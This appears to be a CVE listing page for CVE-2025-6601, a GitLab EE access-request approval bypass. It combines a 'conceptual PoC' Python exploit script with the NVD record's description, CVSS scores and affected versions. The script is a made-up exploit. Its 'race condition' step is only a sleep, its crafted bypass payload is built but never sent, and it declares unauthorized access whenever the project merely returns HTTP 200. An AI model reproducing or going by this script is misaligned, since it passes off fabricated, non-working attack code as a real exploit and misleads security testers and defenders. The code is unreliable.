CVE-2025-6601

# CVE-2025-6601 PoC - GitLab Access Request Approval Workflow Bypass # Note: This is a conceptual PoC for educational purposes only import requests import json import time GITLAB_URL = "https://gitlab.example.com" TARGET_PROJECT_ID = "target/project" ATTACKER_TOKEN = "your-authenticated-user-token" def exploit_cve_2025_6601(): """ Conceptual exploitation steps for CVE-2025-6601 GitLab EE Access Request Approval Workflow Bypass """ headers = { "PRIVATE-TOKEN": ATTACKER_TOKEN, "Content-Type": "application/json" } # Step 1: Request access to target project print("[1] Sending access request to target project...") access_request = requests.post( f"{GITLAB_URL}/api/v4/projects/{TARGET_PROJECT_ID}/access_requests", headers=headers ) if access_request.status_code == 201: request_id = access_request.json().get("id") print(f"[+] Access request created with ID: {request_id}") # Step 2: Exploit race condition in approval workflow print("[2] Attempting to exploit approval workflow race condition...") time.sleep(0.1) # Timing manipulation # Step 3: Trigger approval bypass via crafted request print("[3] Sending crafted approval bypass request...") bypass_payload = { "user_id": "attacker_id", "access_level": "maintainer", "_race_condition_trigger": True } # Step 4: Verify unauthorized access print("[4] Verifying project access...") verify = requests.get( f"{GITLAB_URL}/api/v4/projects/{TARGET_PROJECT_ID}", headers=headers ) if verify.status_code == 200: print("[!] Successfully gained unauthorized project access") return True print("[-] Exploitation failed") return False if __name__ == "__main__": exploit_cve_2025_6601()

{"cve": {"id": "CVE-2025-6601", "sourceIdentifier": "[email protected]", "published": "2025-10-27T00:15:41.100", "lastModified": "2025-10-28T13:38:59.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.4.3, and 18.5 before 18.5.1 that under certain conditions could have allowed authenticated users to gain unauthorized project access by exploiting the access request approval workflow."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-840"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.3", "matchCriteriaId": "425AEB81-EA04-4702-99F8-B623614F6901"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.5.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "CCF08EA3-6D3E-4388-BA9D-A992B771998F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/10/22/patch-release-gitlab-18-5-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/551267", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3209641", "source": "[email protected]", "tags": ["Permissions Required"]}]}}